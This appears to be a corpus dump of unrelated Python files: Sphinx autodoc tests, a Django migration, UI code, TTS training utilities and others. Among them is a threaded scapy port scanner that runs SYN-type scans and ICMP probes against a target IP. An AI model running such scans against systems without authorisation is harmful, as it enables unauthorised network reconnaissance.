autofunction:: target.typehints.tuple_args\n' '\n' ' :param x: arg\n' ' :return: another tuple\n' ) app.build() context = (app.outdir / 'index.txt').read_text() assert ('target.typehints.incr(a, b=1)\n' '\n' 'target.typehints.tuple_args(x)\n' '\n' ' Parameters:\n' ' **x** (*Tuple**[**int**, **Union**[**int**, **str**]**]*) -- arg\n' '\n' ' Returns:\n' ' another tuple\n' '\n' ' Return type:\n' ' Tuple[int, int]\n' in context) @pytest.mark.sphinx('text', testroot='ext-autodoc', confoverrides={'autodoc_typehints': "description"}) def test_autodoc_typehints_description_with_documented_init(app): (app.srcdir / 'index.rst').write_text( '.. autoclass:: target.typehints._ClassWithDocumentedInit\n' ' :special-members: __init__\n' ) app.build() context = (app.outdir / 'index.txt').read_text() assert ('class target.typehints._ClassWithDocumentedInit(x)\n' '\n' ' Class docstring.\n' '\n' ' Parameters:\n' ' **x** (*int*) --\n' '\n' ' Return type:\n' ' None\n' '\n' ' __init__(x)\n' '\n' ' Init docstring.\n' '\n' ' Parameters:\n' ' **x** (*int*) -- Some integer\n' '\n' ' Return type:\n' ' None\n' == context) @pytest.mark.sphinx('text', testroot='ext-autodoc', confoverrides={'autodoc_typehints': "description", 'autodoc_typehints_description_target': 'documented'}) def test_autodoc_typehints_description_with_documented_init_no_undoc(app): (app.srcdir / 'index.rst').write_text( '.. autoclass:: target.typehints._ClassWithDocumentedInit\n' ' :special-members: __init__\n' ) app.build() context = (app.outdir / 'index.txt').read_text() assert ('class target.typehints._ClassWithDocumentedInit(x)\n' '\n' ' Class docstring.\n' '\n' ' __init__(x)\n' '\n' ' Init docstring.\n' '\n' ' Parameters:\n' ' **x** (*int*) -- Some integer\n' == context) @pytest.mark.sphinx('text', testroot='ext-autodoc', confoverrides={'autodoc_typehints': "description"}) def test_autodoc_typehints_description_for_invalid_node(app): text = ".. 
py:function:: hello; world" restructuredtext.parse(app, text) # raises no error @pytest.mark.sphinx('text', testroot='ext-autodoc', confoverrides={'autodoc_typehints': "both"}) def test_autodoc_typehints_both(app): (app.srcdir / 'index.rst').write_text( '.. autofunction:: target.typehints.incr\n' '\n' '.. autofunction:: target.typehints.tuple_args\n' '\n' '.. autofunction:: target.overload.sum\n' ) app.build() context = (app.outdir / 'index.txt').read_text() assert ('target.typehints.incr(a: int, b: int = 1) -> int\n' '\n' ' Parameters:\n' ' * **a** (*int*) --\n' '\n' ' * **b** (*int*) --\n' '\n' ' Return type:\n' ' int\n' in context) assert ('target.typehints.tuple_args(x: Tuple[int, Union[int, str]]) -> Tuple[int, int]\n' '\n' ' Parameters:\n' ' **x** (*Tuple**[**int**, **Union**[**int**, **str**]**]*) --\n' '\n' ' Return type:\n' ' Tuple[int, int]\n' in context) # Overloads still get displyed in the signature assert ('target.overload.sum(x: int, y: int = 0) -> int\n' 'target.overload.sum(x: float, y: float = 0.0) -> float\n' 'target.overload.sum(x: str, y: str = None) -> str\n' '\n' ' docstring\n' in context) @pytest.mark.skipif(sys.version_info < (3, 7), reason='python 3.7+ is required.') @pytest.mark.sphinx('text', testroot='ext-autodoc') def test_autodoc_type_aliases(app): # default options = {"members": None} actual = do_autodoc(app, 'module', 'target.autodoc_type_aliases', options) assert list(actual) == [ '', '.. py:module:: target.autodoc_type_aliases', '', '', '.. py:class:: Foo()', ' :module: target.autodoc_type_aliases', '', ' docstring', '', '', ' .. py:attribute:: Foo.attr1', ' :module: target.autodoc_type_aliases', ' :type: int', '', ' docstring', '', '', ' .. py:attribute:: Foo.attr2', ' :module: target.autodoc_type_aliases', ' :type: int', '', ' docstring', '', '', '.. py:function:: mult(x: int, y: int) -> int', ' mult(x: float, y: float) -> float', ' :module: target.autodoc_type_aliases', '', ' docstring', '', '', '.. 
py:function:: read(r: _io.BytesIO) -> _io.StringIO', ' :module: target.autodoc_type_aliases', '', ' docstring', '', '', '.. py:function:: sum(x: int, y: int) -> int', ' :module: target.autodoc_type_aliases', '', ' docstring', '', '', '.. py:data:: variable', ' :module: target.autodoc_type_aliases', ' :type: int', '', ' docstring', '', '', '.. py:data:: variable2', ' :module: target.autodoc_type_aliases', ' :type: int', ' :value: None', '', ' docstring', '', ] # define aliases app.config.autodoc_type_aliases = {'myint': 'myint', 'io.StringIO': 'my.module.StringIO'} actual = do_autodoc(app, 'module', 'target.autodoc_type_aliases', options) assert list(actual) == [ '', '.. py:module:: target.autodoc_type_aliases', '', '', '.. py:class:: Foo()', ' :module: target.autodoc_type_aliases', '', ' docstring', '', '', ' .. py:attribute:: Foo.attr1', ' :module: target.autodoc_type_aliases', ' :type: myint', '', ' docstring', '', '', ' .. py:attribute:: Foo.attr2', ' :module: target.autodoc_type_aliases', ' :type: myint', '', ' docstring', '', '', '.. py:function:: mult(x: myint, y: myint) -> myint', ' mult(x: float, y: float) -> float', ' :module: target.autodoc_type_aliases', '', ' docstring', '', '', '.. py:function:: read(r: _io.BytesIO) -> my.module.StringIO', ' :module: target.autodoc_type_aliases', '', ' docstring', '', '', '.. py:function:: sum(x: myint, y: myint) -> myint', ' :module: target.autodoc_type_aliases', '', ' docstring', '', '', '.. py:data:: variable', ' :module: target.autodoc_type_aliases', ' :type: myint', '', ' docstring', '', '', '.. 
py:data:: variable2', ' :module: target.autodoc_type_aliases', ' :type: myint', ' :value: None', '', ' docstring', '', ] @pytest.mark.skipif(sys.version_info < (3, 7), reason='python 3.7+ is required.') @pytest.mark.sphinx('text', testroot='ext-autodoc', srcdir='autodoc_typehints_description_and_type_aliases', confoverrides={'autodoc_typehints': "description", 'autodoc_type_aliases': {'myint': 'myint'}}) def test_autodoc_typehints_description_and_type_aliases(app): (app.srcdir / 'autodoc_type_aliases.rst').write_text('.. autofunction:: target.autodoc_type_aliases.sum') app.build() context = (app.outdir / 'autodoc_type_aliases.txt').read_text() assert ('target.autodoc_type_aliases.sum(x, y)\n' '\n' ' docstring\n' '\n' ' Parameters:\n' ' * **x** (*myint*) --\n' '\n' ' * **y** (*myint*) --\n' '\n' ' Return type:\n' ' myint\n' == context) @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autodoc_default_options(app): # no settings actual = do_autodoc(app, 'class', 'target.enums.EnumCls') assert ' .. py:attribute:: EnumCls.val1' not in actual assert ' .. py:attribute:: EnumCls.val4' not in actual actual = do_autodoc(app, 'class', 'target.CustomIter') assert ' .. py:method:: target.CustomIter' not in actual actual = do_autodoc(app, 'module', 'target') assert '.. py:function:: save_traceback(app)' not in actual # with :members: app.config.autodoc_default_options = {'members': None} actual = do_autodoc(app, 'class', 'target.enums.EnumCls') assert ' .. py:attribute:: EnumCls.val1' in actual assert ' .. py:attribute:: EnumCls.val4' not in actual # with :members: = True app.config.autodoc_default_options = {'members': None} actual = do_autodoc(app, 'class', 'target.enums.EnumCls') assert ' .. py:attribute:: EnumCls.val1' in actual assert ' .. 
py:attribute:: EnumCls.val4' not in actual # with :members: and :undoc-members: app.config.autodoc_default_options = { 'members': None, 'undoc-members': None, } actual = do_autodoc(app, 'class', 'target.enums.EnumCls') assert ' .. py:attribute:: EnumCls.val1' in actual assert ' .. py:attribute:: EnumCls.val4' in actual # with :special-members: # Note that :members: must be *on* for :special-members: to work. app.config.autodoc_default_options = { 'members': None, 'special-members': None } actual = do_autodoc(app, 'class', 'target.CustomIter') assert ' .. py:method:: CustomIter.__init__()' in actual assert ' Create a new `CustomIter`.' in actual assert ' .. py:method:: CustomIter.__iter__()' in actual assert ' Iterate squares of each value.' in actual if not IS_PYPY: assert ' .. py:attribute:: CustomIter.__weakref__' in actual assert ' list of weak references to the object (if defined)' in actual # :exclude-members: None - has no effect. Unlike :members:, # :special-members:, etc. where None == "include all", here None means # "no/false/off". app.config.autodoc_default_options = { 'members': None, 'exclude-members': None, } actual = do_autodoc(app, 'class', 'target.enums.EnumCls') assert ' .. py:attribute:: EnumCls.val1' in actual assert ' .. py:attribute:: EnumCls.val4' not in actual app.config.autodoc_default_options = { 'members': None, 'special-members': None, 'exclude-members': None, } actual = do_autodoc(app, 'class', 'target.CustomIter') assert ' .. py:method:: CustomIter.__init__()' in actual assert ' Create a new `CustomIter`.' in actual assert ' .. py:method:: CustomIter.__iter__()' in actual assert ' Iterate squares of each value.' in actual if not IS_PYPY: assert ' .. py:attribute:: CustomIter.__weakref__' in actual assert ' list of weak references to the object (if defined)' in actual assert ' .. py:method:: CustomIter.snafucate()' in actual assert ' Makes this snafucated.' 
in actual @pytest.mark.sphinx('html', testroot='ext-autodoc') def test_autodoc_default_options_with_values(app): # with :members: app.config.autodoc_default_options = {'members': 'val1,val2'} actual = do_autodoc(app, 'class', 'target.enums.EnumCls') assert ' .. py:attribute:: EnumCls.val1' in actual assert ' .. py:attribute:: EnumCls.val2' in actual assert ' .. py:attribute:: EnumCls.val3' not in actual assert ' .. py:attribute:: EnumCls.val4' not in actual # with :member-order: app.config.autodoc_default_options = { 'members': None, 'member-order': 'bysource', } actual = do_autodoc(app, 'class', 'target.Class') assert list(filter(lambda l: '::' in l, actual)) == [ '.. py:class:: Class(arg)', ' .. py:method:: Class.meth()', ' .. py:method:: Class.skipmeth()', ' .. py:method:: Class.excludemeth()', ' .. py:attribute:: Class.attr', ' .. py:attribute:: Class.docattr', ' .. py:attribute:: Class.udocattr', ' .. py:attribute:: Class.mdocattr', ' .. py:method:: Class.moore(a, e, f) -> happiness', ' .. py:attribute:: Class.inst_attr_inline', ' .. py:attribute:: Class.inst_attr_comment', ' .. py:attribute:: Class.inst_attr_string', ] # with :special-members: app.config.autodoc_default_options = { 'special-members': '__init__,__iter__', } actual = do_autodoc(app, 'class', 'target.CustomIter') assert ' .. py:method:: CustomIter.__init__()' in actual assert ' Create a new `CustomIter`.' in actual assert ' .. py:method:: CustomIter.__iter__()' in actual assert ' Iterate squares of each value.' in actual if not IS_PYPY: assert ' .. py:attribute:: CustomIter.__weakref__' not in actual assert ' list of weak references to the object (if defined)' not in actual # with :exclude-members: app.config.autodoc_default_options = { 'members': None, 'exclude-members': 'val1' } actual = do_autodoc(app, 'class', 'target.enums.EnumCls') assert ' .. py:attribute:: EnumCls.val1' not in actual assert ' .. py:attribute:: EnumCls.val2' in actual assert ' .. 
py:attribute:: EnumCls.val3' in actual assert ' .. py:attribute:: EnumCls.val4' not in actual app.config.autodoc_default_options = { 'members': None, 'special-members': None, 'exclude-members': '__weakref__,snafucate', } actual = do_autodoc(app, 'class', 'target.CustomIter') assert ' .. py:method:: CustomIter.__init__()' in actual assert ' Create a new `CustomIter`.' in actual assert ' .. py:method:: CustomIter.__iter__()' in actual assert ' Iterate squares of each value.' in actual if not IS_PYPY: assert ' .. py:attribute:: CustomIter.__weakref__' not in actual assert ' list of weak references to the object (if defined)' not in actual assert ' .. py:method:: CustomIter.snafucate()' not in actual assert ' Makes this snafucated.' not in actual
nilq/baby-python
python
from collections import Counter def mejority(lst): freDict = Counter(lst) size = len(lst) for key, value in freDict.items(): if value > (size//2): print(key) return print("None") if __name__ == "__main__": lst = [3, 3, 4, 2, 4, 4, 2, 2,2,2,2] mejority(lst)
nilq/baby-python
python
import pytest import pathlib from align.cell_fabric import Canvas, Pdk, Wire mydir = pathlib.Path(__file__).resolve().parent pdkfile = mydir.parent.parent / 'pdks' / 'FinFET14nm_Mock_PDK' / 'layers.json' @pytest.fixture def setup(): p = Pdk().load(pdkfile) c = Canvas(p) c.addGen( Wire( nm='m2', layer='M2', direction='h', clg=None, spg=None)) m2 = p['M2'] m2['AdjacentAttacker'] = 1 assert 'Width' in m2 dy = m2['Width']//2 py = m2['Pitch'] c.terminals = [ {'layer': 'M2', 'netName': 'x', 'rect': [ 0, 0*py-dy, 200, 0*py+dy], "netType": "drawing"}, {'layer': 'M2', 'netName': 'y', 'rect': [ 200, 1*py-dy, 400, 1*py+dy], "netType": "drawing"} ] return c def test_adjacent_ok(setup): c = setup c.gen_data() assert c.drc.num_errors == 0 def test_adjacent_bad(setup): c = setup c.terminals[1]['rect'][0] += 1 c.terminals[1]['rect'][2] += 1 c.gen_data() assert c.drc.num_errors == 1 def test_adjacent_ok2(setup): c = setup c.terminals[1]['rect'][0] += 2 c.terminals[1]['rect'][2] += 2 c.gen_data() assert c.drc.num_errors == 0
nilq/baby-python
python
# -*- coding: utf-8 -*- """ Script Name: PipelineTool.py Author: Do Trinh/Jimmy - 3D artist. Description: This is main UI of PipelineTool. """ # ------------------------------------------------------------------------------------------------------------- """ Import """ # PLM from PLM import __homepage__, __appName__ from pyPLM.damg import DAMGDICT from pyPLM.Widgets import MainWindow, Widget, GridLayout from pyPLM.Gui import LogoIcon from .components import MainStatusBar, MidTab, BotTab, MainHeader from .models import ButtonManager, ActionManager from PLM.cores import ThreadManager # ------------------------------------------------------------------------------------------------------------- """ Pipeline Tool main layout """ class PipelineManager(MainWindow): key = 'PipelineManager' _name = __appName__ toolBars = DAMGDICT() menus = DAMGDICT() _count = 0 def __init__(self, parent=None): super(PipelineManager, self).__init__(parent) self.url = __homepage__ self.setObjectName(self.name) self.setWindowTitle(self.name) self.setWindowIcon(LogoIcon('PLM')) self.actionManager = ActionManager(self.parent) self.buttonManager = ButtonManager(self.parent) self.threadManager = ThreadManager(self.parent) self.mainWidget = Widget() self.layout = GridLayout() self.mainWidget.setLayout(self.layout) self.setCentralWidget(self.mainWidget) self.buildUI() def buildUI(self): self.header = MainHeader(self.parent) self.body = MidTab(self.buttonManager, self) self.footer = BotTab(self) self.statusBar = MainStatusBar(self) self.menus = self.header.menuBar.menus self.toolBars = self.header.toolBar.toolBars self.mns = self.header.menuBar.mns self.tbs = self.header.toolBar.tbs self.updating = self.header.connectStatus.updating self.server = self.header.connectStatus.server self.connectServer = self.header.connectStatus.connectServer self.connectInternet = self.header.connectStatus.connectInternet self.layouts = [self.header, self.body, self.footer, self.statusBar] 
self.layout.addWidget(self.header, 0, 0, 2, 9) self.layout.addWidget(self.body, 2, 0, 8, 9) self.layout.addWidget(self.footer, 10, 0, 6, 9) self.setStatusBar(self.statusBar) self.body.setFixedHeight(400) self.updateSize() def resizeEvent(self, event): self.updateSize() # print('header: {0}, body: {1}, footer: {2}'.format(self.header.height(), self.body.height(), self.footer.height())) super(PipelineManager, self).resizeEvent(event) def updateSize(self): bodySize = self.body.size() baseW = bodySize.width() baseH = bodySize.height() self.header.resize(baseW, baseH / 4) self.footer.resize(baseW, baseH * 3 / 4) @property def count(self): return self._count @count.setter def count(self, val): self._count = val # ------------------------------------------------------------------------------------------------------------- # Created by panda on 6/07/2018 - 11:31 AM # © 2017 - 2018 DAMGTEAM. All rights reserved
nilq/baby-python
python
from pyiced import ( column, css_color, IcedApp, Length, radio, Settings, text, WindowSettings, ) class RadioExample(IcedApp): class settings(Settings): class window(WindowSettings): size = (640, 320) def __init__(self): self.__season = None def title(self): return 'Radio Example' def background_color(self): match self.__season: case 1: return css_color.MEDIUMSPRINGGREEN case 2: return css_color.LIGHTGOLDENRODYELLOW case 3: return css_color.GOLDENROD case 4: return css_color.GHOSTWHITE def update(self, msg, clipboard): match msg: case 'select', value: self.__season = value def view(self): return column( [ text("What's your favorite season?"), radio('select', self.__season, 1, 'Spring'), radio('select', self.__season, 2, 'Summer'), radio('select', self.__season, 3, 'Fall'), radio('select', self.__season, 4, 'Winter'), ], padding=20, spacing=5, width=Length.FILL, height=Length.FILL, ) if __name__ == '__main__': RadioExample().run()
nilq/baby-python
python
# Copyright (C) 2021 ServiceNow, Inc.
""" Combine output datasets from different source datasets

e.g. If you have generated training datasets for dataset A and dataset B
you can combine them into A+B using this script

It will *not* overwrite existing files (an error will be thrown).
Input files must exist (an error will be thrown otherwise).

It assumes that the output file will be saved to the same folder as the
input (/nrcan_p2/data/03_primary/). It assumes nrcan specific file naming
conventions.

You MUST update the dataset parameters below.
"""
import pathlib
import shutil
import subprocess  # NOTE: unused here, kept to avoid breaking downstream imports

###################################
# DATASET PARAMETERS
PIPE = 'PIPELINE_BERT_80_POSTPIPE_BERT_SPACY_2' #'PIPELINE_GLOVE_80_POSTPIPE_GLOVE'
DATASET_A = 'dA_full_dB'
DATASET_B = 'dD'
DATASET_C = 'dA_full_dB_dD'
###################################

print('Combining files...')

# Map dataset name -> subfolder under /nrcan_p2/data/03_primary/
DIR_MAPPING = {
    'dA_full': 'v4',
    'dB': 'v4_B',
    'dD': 'v4_D',
    'dA_full_dB': 'v4_A_B',
    'dA_full_dB_dD': 'v4_A_B_D'
}

DIR_A = DIR_MAPPING[DATASET_A]
DIR_B = DIR_MAPPING[DATASET_B]
DIR_C = DIR_MAPPING[DATASET_C]

FILE_A = f'/nrcan_p2/data/03_primary/{DIR_A}/all_text_{PIPE}_{DATASET_A}_v1.txt'
print(FILE_A)
FILE_B = f'/nrcan_p2/data/03_primary/{DIR_B}/all_text_{PIPE}_{DATASET_B}_v1.txt'
print(FILE_B)
print('... into:')
FILE_C = f'/nrcan_p2/data/03_primary/{DIR_C}/all_text_{PIPE}_{DATASET_C}_v1.txt'
print(FILE_C)

file_a = pathlib.Path(FILE_A)
file_b = pathlib.Path(FILE_B)
file_c = pathlib.Path(FILE_C)

# Log file sits next to the output, with the same stem.
LOG_FILE = file_c.parent / (file_c.stem + '.log')

# Fail fast: inputs must exist, output must not (no silent overwrite).
# (Idiom fix: `raise ValueError(...)`, not `raise(ValueError(...))`.)
if not file_a.exists():
    raise ValueError(f'File a does not exist: {FILE_A}')
if not file_b.exists():
    raise ValueError(f'File b does not exist: {FILE_B}')
if file_c.exists():
    raise ValueError(f'File c already exists. You must delete it manually: {FILE_C}')

# Record which files were combined.
with open(LOG_FILE, 'w') as lf:
    lf.write(f'FILE_A: {FILE_A}\n')
    lf.write(f'FILE_B: {FILE_B}\n')
    lf.write(f'FILE_C: {FILE_C}\n')

# Stream-concatenate A then B into C. shutil.copyfileobj copies in chunks,
# so large corpora are never fully loaded into memory.
with open(file_a, 'r') as fa, open(file_b, 'r') as fb, open(file_c, 'w') as fc:
    shutil.copyfileobj(fa, fc)
    shutil.copyfileobj(fb, fc)

if not file_c.exists():
    raise ValueError('ERROR! Something went wrong in the concatenation.')
nilq/baby-python
python
import logging, queue
from datetime import datetime
import threading
from time import strftime

from .scanner_thread import ScannerThread
from scapy.all import *


class PyScanner:
    """Simple threaded port scanner front-end.

    Splits the requested port range into one contiguous sub-range per worker
    thread and runs a ScannerThread over each sub-range.
    """

    def __init__(self, params_names=None):
        """Run a scan described by `params_names`.

        Args:
            params_names (dict | None): CLI-style options:
                "-threads" (int/str), "-ip" (str), "-ports" ("lo-hi" str),
                "-scan_type" (str). Defaults to a SYN scan of 127.0.0.1.
        """
        # BUGFIX: no shared mutable default dict, and the caller's dict is
        # copied instead of being mutated in place.
        if params_names is None:
            params_names = {"-threads": 5, "-ip": "127.0.0.1",
                            "-ports": "0-100", "-scan_type": "S"}
        else:
            params_names = dict(params_names)

        params_names["-threads"] = int(params_names["-threads"])
        threads_count = params_names["-threads"]
        scan_type = params_names["-scan_type"]

        self.lock = threading.Lock()
        self.queue = queue.Queue()

        # "lo-hi" -> per-thread port sub-ranges.
        ports_pair = params_names["-ports"].split("-")
        ports_ranges = self.calcTasks(threads_num=threads_count, ports=ports_pair)

        # Timer used to measure total scan duration.
        start_clock = datetime.now()

        self.threads = []
        for i in range(threads_count):
            thread = ScannerThread(dest_ip=params_names["-ip"],
                                   ports=ports_ranges[i],
                                   thread_num=i,
                                   scan_type=scan_type)
            self.threads.append(thread)

        # BUGFIX: start every worker first, then join them all. The original
        # called join() immediately after each start(), which serialized the
        # whole scan and defeated the "-threads" parameter.
        for th in self.threads:
            th.start()
        for th in self.threads:
            th.join()

        end_clock = datetime.now()
        # Exposed for callers that want the elapsed wall-clock time.
        self.scan_duration = end_clock - start_clock

    def calcTasks(self, threads_num=1, ports=None, queue=None):
        """Split [ports[0], ports[1]] into `threads_num` contiguous sub-ranges.

        Args:
            threads_num (int): number of worker threads / sub-ranges.
            ports (list | None): two-element [lo, hi] (ints or numeric
                strings). Defaults to [0, 65536].
            queue: unused; kept for backward compatibility.

        Returns:
            list[dict]: dicts with "from"/"to" port bounds, one per thread.
        """
        # BUGFIX: mutable default arguments replaced by None sentinels.
        if ports is None:
            ports = [0, 65536]
        lo, hi = int(ports[0]), int(ports[1])

        chunk = round((hi - lo) / threads_num)  # ports per thread (rounded)

        ports_ranges = []
        last_from = lo
        last_to = last_from + chunk
        for i in range(threads_num):
            # NOTE(review): ranges start at last_from + 1, so port `lo` itself
            # is never scanned — preserved from the original; confirm intent.
            rng = {"from": last_from + 1, "to": last_to}
            ports_ranges.append(rng)
            last_from = rng["to"]
            last_to = last_from + chunk

        # BUGFIX: rounding could leave the tail of the range uncovered (e.g.
        # 0-100 over 3 threads previously stopped at 99) or overshoot past
        # `hi`; clamp the final sub-range to end exactly at `hi`.
        if ports_ranges and ports_ranges[-1]["to"] != hi:
            ports_ranges[-1]["to"] = hi

        print("there is ports ranges")
        print(ports_ranges)
        return ports_ranges

    def checkhost(self, ip="127.0.0.1"):
        """Send one ICMP echo to `ip` to verify the target is reachable."""
        # conf.verb = 0
        a = send(IP(ttl=10, dst=ip) / ICMP())
        print(a)
        print("\n[*] Target is up, Beginning scanning...")
nilq/baby-python
python
def som(n):
    """Return the digital root of the digit string *n*.

    The result is a one-character string (e.g. som('99') == '9'), which is
    what the comparison logic in main() relies on: single-digit strings
    compare lexicographically the same way they compare numerically.
    """
    if len(n) == 1:
        return n
    return som(str(sum(int(digit) for digit in n)))


def main():
    """Read pairs of numbers until '0 0'; compare their digital roots.

    Prints 1 if the first root is larger, 2 if the second is larger,
    0 on a tie.
    """
    while True:
        tokens = input().split()
        a, b = tokens[0], tokens[1]
        if a == b == '0':
            break
        ta = som(a)
        tb = som(b)
        if ta > tb:
            print(1)
        elif ta < tb:
            print(2)
        else:
            print(0)


if __name__ == '__main__':
    # BUGFIX: the read loop used to run at module top level, which made the
    # module block on stdin when imported; guarding it keeps the script
    # behaviour identical while making `som` importable and testable.
    main()
nilq/baby-python
python
# Generated by Django 2.0.4 on 2018-12-13 12:38 from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ ('tradukoj', '0007_bcp47_default'), ] operations = [ migrations.CreateModel( name='GetTextFile', fields=[ ('id', models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('file', models.FileField(upload_to='')), ('file_type', models.IntegerField( choices=[(0, 'PO file'), (1, 'MO file')], default=0)), ('last_updated_date', models.DateTimeField( auto_now=True, db_index=True, verbose_name='Last updated date')), ('done', models.BooleanField(default=False)), ('done_with_errors', models.BooleanField(default=False)), ('log', models.TextField(max_length=1024, verbose_name='Log')), ('bcp47', models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name='get_text_files', to='tradukoj.BCP47', verbose_name='Lang')), ], ), migrations.CreateModel( name='Namespace', fields=[ ('id', models.AutoField( auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('text', models.CharField( max_length=255, unique=True, verbose_name='text key')), ], ), migrations.AlterField( model_name='translationkey', name='namespace', field=models.CharField(max_length=255), ), migrations.AlterField( model_name='translationkey', name='text', field=models.CharField(max_length=255, verbose_name='text key'), ), migrations.AddField( model_name='translationkey', name='new_namespace', field=models.ForeignKey( null=True, on_delete=django.db.models.deletion.CASCADE, related_name='translation_keys', to='tradukoj.Namespace'), ), migrations.AlterUniqueTogether( name='translationkey', unique_together={('namespace', 'text')}, ), migrations.AddField( model_name='gettextfile', name='namespace', field=models.ForeignKey( on_delete=django.db.models.deletion.CASCADE, related_name='get_text_files', to='tradukoj.Namespace'), ), ]
nilq/baby-python
python
import shutil from pathlib import Path import hydra import matplotlib.pyplot as plt import numpy as np import torch from hydra.utils import to_absolute_path from omegaconf import OmegaConf from torch import nn, optim from torch.utils import data as data_utils from torch.utils.tensorboard import SummaryWriter from ttslearn.logger import getLogger from ttslearn.util import init_seed, load_utt_list, pad_1d, pad_2d def get_epochs_with_optional_tqdm(tqdm_mode, nepochs): """Get epochs with optional progress bar. Args: tqdm_mode (str): Progress bar mode. nepochs (int): Number of epochs. Returns: iterable: Epochs. """ if tqdm_mode == "tqdm": from tqdm import tqdm epochs = tqdm(range(1, nepochs + 1), desc="epoch") else: epochs = range(1, nepochs + 1) return epochs def moving_average_(model, model_test, beta=0.9999): """Exponential moving average (EMA) of model parameters. Args: model (torch.nn.Module): Model to perform EMA on. model_test (torch.nn.Module): Model to use for the test phase. beta (float, optional): [description]. Defaults to 0.9999. """ for param, param_test in zip(model.parameters(), model_test.parameters()): param_test.data = torch.lerp(param.data, param_test.data, beta) def num_trainable_params(model): """Count the number of trainable parameters in the model. Args: model (torch.nn.Module): Model to count the number of trainable parameters. Returns: int: Number of trainable parameters. 
""" parameters = filter(lambda p: p.requires_grad, model.parameters()) return sum([np.prod(p.size()) for p in parameters]) class Dataset(data_utils.Dataset): # type: ignore """Dataset for numpy files Args: in_paths (list): List of paths to input files out_paths (list): List of paths to output files """ def __init__(self, in_paths, out_paths): self.in_paths = in_paths self.out_paths = out_paths def __getitem__(self, idx): """Get a pair of input and target Args: idx (int): index of the pair Returns: tuple: input and target in numpy format """ return np.load(self.in_paths[idx]), np.load(self.out_paths[idx]) def __len__(self): """Returns the size of the dataset Returns: int: size of the dataset """ return len(self.in_paths) def get_data_loaders(data_config, collate_fn): """Get data loaders for training and validation. Args: data_config (dict): Data configuration. collate_fn (callable): Collate function. Returns: dict: Data loaders. """ data_loaders = {} for phase in ["train", "dev"]: utt_ids = load_utt_list(to_absolute_path(data_config[phase].utt_list)) in_dir = Path(to_absolute_path(data_config[phase].in_dir)) out_dir = Path(to_absolute_path(data_config[phase].out_dir)) in_feats_paths = [in_dir / f"{utt_id}-feats.npy" for utt_id in utt_ids] out_feats_paths = [out_dir / f"{utt_id}-feats.npy" for utt_id in utt_ids] dataset = Dataset(in_feats_paths, out_feats_paths) data_loaders[phase] = data_utils.DataLoader( dataset, batch_size=data_config.batch_size, collate_fn=collate_fn, pin_memory=True, num_workers=data_config.num_workers, shuffle=phase.startswith("train"), ) return data_loaders def collate_fn_dnntts(batch): """Collate function for DNN-TTS. Args: batch (list): List of tuples of the form (inputs, targets). Returns: tuple: Batch of inputs, targets, and lengths. 
""" lengths = [len(x[0]) for x in batch] max_len = max(lengths) x_batch = torch.stack([torch.from_numpy(pad_2d(x[0], max_len)) for x in batch]) y_batch = torch.stack([torch.from_numpy(pad_2d(x[1], max_len)) for x in batch]) l_batch = torch.tensor(lengths, dtype=torch.long) return x_batch, y_batch, l_batch def collate_fn_wavenet(batch, max_time_frames=100, hop_size=80, aux_context_window=2): """Collate function for WaveNet. Args: batch (list): List of tuples of the form (inputs, targets). max_time_frames (int, optional): Number of time frames. Defaults to 100. hop_size (int, optional): Hop size. Defaults to 80. aux_context_window (int, optional): Auxiliary context window. Defaults to 2. Returns: tuple: Batch of waveforms and conditional features. """ max_time_steps = max_time_frames * hop_size xs, cs = [b[1] for b in batch], [b[0] for b in batch] # 条件付け特徴量の開始位置をランダム抽出した後、それに相当する短い音声波形を切り出します c_lengths = [len(c) for c in cs] start_frames = np.array( [ np.random.randint( aux_context_window, cl - aux_context_window - max_time_frames ) for cl in c_lengths ] ) x_starts = start_frames * hop_size x_ends = x_starts + max_time_steps c_starts = start_frames - aux_context_window c_ends = start_frames + max_time_frames + aux_context_window x_cut = [x[s:e] for x, s, e in zip(xs, x_starts, x_ends)] c_cut = [c[s:e] for c, s, e in zip(cs, c_starts, c_ends)] # numpy.ndarray のリスト型から torch.Tensor 型に変換します x_batch = torch.tensor(x_cut, dtype=torch.long) # (B, T) c_batch = torch.tensor(c_cut, dtype=torch.float).transpose(2, 1) # (B, C, T') return x_batch, c_batch def ensure_divisible_by(feats, N): """Ensure that the number of frames is divisible by N. Args: feats (np.ndarray): Input features. N (int): Target number of frames. Returns: np.ndarray: Input features with number of frames divisible by N. 
""" if N == 1: return feats mod = len(feats) % N if mod != 0: feats = feats[: len(feats) - mod] return feats def collate_fn_tacotron(batch, reduction_factor=1): """Collate function for Tacotron. Args: batch (list): List of tuples of the form (inputs, targets). reduction_factor (int, optional): Reduction factor. Defaults to 1. Returns: tuple: Batch of inputs, input lengths, targets, target lengths and stop flags. """ xs = [x[0] for x in batch] ys = [ensure_divisible_by(x[1], reduction_factor) for x in batch] in_lens = [len(x) for x in xs] out_lens = [len(y) for y in ys] in_max_len = max(in_lens) out_max_len = max(out_lens) x_batch = torch.stack([torch.from_numpy(pad_1d(x, in_max_len)) for x in xs]) y_batch = torch.stack([torch.from_numpy(pad_2d(y, out_max_len)) for y in ys]) il_batch = torch.tensor(in_lens, dtype=torch.long) ol_batch = torch.tensor(out_lens, dtype=torch.long) stop_flags = torch.zeros(y_batch.shape[0], y_batch.shape[1]) for idx, out_len in enumerate(out_lens): stop_flags[idx, out_len - 1 :] = 1.0 return x_batch, il_batch, y_batch, ol_batch, stop_flags def set_epochs_based_on_max_steps_(train_config, steps_per_epoch, logger): """Set epochs based on max steps. Args: train_config (TrainConfig): Train config. steps_per_epoch (int): Number of steps per epoch. logger (logging.Logger): Logger. 
